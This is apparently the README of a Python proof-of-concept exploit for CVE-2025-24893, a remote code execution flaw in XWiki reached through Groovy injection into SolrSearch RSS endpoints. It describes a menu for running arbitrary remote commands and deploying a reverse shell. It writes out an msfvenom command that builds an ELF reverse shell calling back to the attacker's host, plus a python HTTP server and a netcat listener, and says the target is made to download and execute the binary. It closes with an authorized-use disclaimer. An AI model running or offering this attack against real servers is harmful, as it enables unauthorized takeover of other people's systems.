This Python script exploits CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
- Single command execution via Groovy injection
- Automatic reverse shell payload generation (with
msfvenom) - Option to customize:
- Remote target
- Local IP address
- HTTP server port
- Reverse shell beacon port
- Clean bash payload previews
- ANSI color-coded interactive TUI
-
Clone or download the script.
-
Make sure you have the following installed:
msfvenomfrom Metasploit- Python 3
jq(used in the bash payloads)
-
Run the script:
python3 CVE-2025-24893-PoC.py-
Select from the menu:
- Run Command – Execute any shell command remotely.
- Reverse Shell – Generate and deploy an ELF reverse shell to the target.
- Change Settings – Modify LHOST, RHOST, server port, or beacon port.
- Payload is generated:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev- You are prompted to start a Python HTTP server and netcat listener:
python3 -m http.server 8080
nc -lvnp 31337-
The script sends the following sequence to the target:
- Download payload
- Make it executable
- Execute the binary
This tool is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.